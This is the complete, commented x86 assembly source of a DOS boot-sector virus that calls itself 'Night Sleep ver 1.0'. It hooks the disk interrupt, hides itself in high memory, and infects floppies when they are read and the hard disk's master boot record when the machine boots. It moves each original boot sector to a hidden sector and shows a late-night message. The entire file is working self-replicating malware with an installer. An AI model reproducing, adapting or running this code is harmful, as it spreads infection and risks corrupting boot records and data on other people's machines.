@@Begin: ; but other programs may, so it must be preserved
mov bx,7c00h
mov sp,bx ; set sp so that ss:sp = 0:7c00h
sti
mov ax,ds:[413h] ; get memory size (0:413h holds the memory size in KB)
dec ax
dec ax
mov ds:[413h],ax ; reduce the recorded memory size by 2K
mov cl,06
shl ax,cl ; compute the high memory segment address
mov es,ax
xor di,di
mov si,sp
mov cx,VirusSize
cld
rep movsb ; move the virus into high memory
push ax
mov di,OFF @@HighAddr
push di
retf ; jump to high memory and continue there
@@HighAddr:
cli ; disable interrupts before changing an interrupt vector
xchg ds:[13h*4+2],ax
mov cs:[OldInt13Seg],ax
mov ax,OFF @@NewInt13
xchg ds:[13h*4],ax
mov cs:[OldInt13Off],ax ; hook interrupt 13h
push ds
pop es ; reset es to 0
cmp dl,80h ; booted from the hard disk?
jz short @@ReadOldHardBoot
push dx ; booted from a floppy, so infect the hard disk
mov dl,80h
call @@OptDisk ; call the infection routine
pop dx
@@ReadOldFlopyBoot: ; read the original floppy boot program
mov ax,0201h
mov cx,79*100h+17 ; on infection the original boot program was saved at head 0 track 79 sector 17
mov dh,00h
call @@CallInt13
jc short @@ReadOldFlopyBoot ; on failure keep reading until it succeeds
@@ExecOldBoot:
cmp es:[bx.Flags],0aa55h
jnz @@ExecOldBoot
mov ah,02h
int 1ah ; get the system time
cmp cx,22*100h+30 ; later than 22:30?
jb @@ExitDisp ; not yet, so do not display
lea si,VirusMsg
@@DispMsg:
mov al,cs:[si]
inc si
mov ah,0eh
int 10h ; display the character in al
or al,al
jnz @@DispMsg
xor ax,ax
int 16h
@@ExitDisp:
mov cx,0001h ; restore the initial value of cx
push es
push bx
retf ; go run the original boot program
@@ReadOldHardBoot:
mov ax,0201h
mov cx,0002h ; on infection the original master boot program was saved at head 0 track 0 sector 2
mov dh,00h
call @@CallInt13 ; read it
jc short @@ReadOldHardBoot ; on failure keep reading until it succeeds
jmp short @@ExecOldBoot ; go run the original boot program
@@NewInt13: ; new Int 13h (infection block)
cmp dx,0000h ; is it a floppy?
jnz short @@JmpOldInt13
cmp ah,02h
jnz short @@JmpOldInt13
cmp cx,0001h
jnz short @@JmpOldInt13
call @@OptDisk ; a floppy sector read was seen, so infect the floppy
@@JmpOldInt13:
cli
JmpFar db 0eah ; far jump instruction
OldInt13Off dw ?
OldInt13Seg dw ?
@@CallInt13:
pushf ; simulate the Int 13h instruction
push cs
call @@JmpOldInt13
ret
@@OptDisk: ; infect the disk indicated by dl (dl: 0 = A:, 80 = C:)
pusha
push ds
push es ; save segment and general registers
push cs
pop es
push cs
pop ds ; make ds = es = cs
mov bx,OFF OldBootSpace
mov ax,0201h
mov cx,0001h
mov dh,00h
call @@CallInt13 ; read the original boot sector
jc short @@OptOver
mov di,bx
cmp ds:[di.VirusFlag],'V' ; already infected?
jz short @@OptOver ; if so, leave
cmp dl,00h
jz short @@IsOptFlopyDisk
@@IsOptHardDisk:
mov cx,0002h ; hard disk: save at head 0 track 0 sector 2
jmp short @@SaveOldBoot
@@IsOptFlopyDisk:
mov cx,79*100h+17 ; floppy: save at head 0 track 79 sector 17
@@SaveOldBoot:
mov ax,0301h
mov dh,0h
call @@CallInt13 ; save the original boot sector
jc short @@OptOver
mov si,OFF @@Start
cld
movsw
movsb ; patch the first instruction of the original sector (3-byte jmp near)
mov di,OFF @@Begin+200h
mov si,OFF @@Begin
mov cx,OFF @@End-OFF @@Begin
cld
rep movsb ; patch cx bytes of the original boot sector code
mov ax,0301h
mov cx,0001h
mov dh,00h
call @@CallInt13 ; write the modified boot program back
@@OptOver: ; leave the infection routine
pop es
pop ds ; restore segment and general registers
popa
ret ; below are the message the virus displays and its version string
VirusMsg db 0dh,0ah,07h,'Night is deep,you must go sleep!',0dh,0ah,0
db 'Night Sleep ver 1.0,by whg 2001.5.5',0
@@End:
org 1feh
Flags dw 0aa55h ; boot sector valid signature
OldBootSpace db 210h dup(?) ; buffer
@@Install:
xor ax,ax
mov ds,ax
cli
mov ax,ds:[13h*4]
mov cs:[OldInt13Off],ax
mov ax,ds:[13h*4+2]
mov cs:[OldInt13Seg],ax
mov dl,80h
call @@OptDisk
mov ax,4c00h
int 21h
End @@Install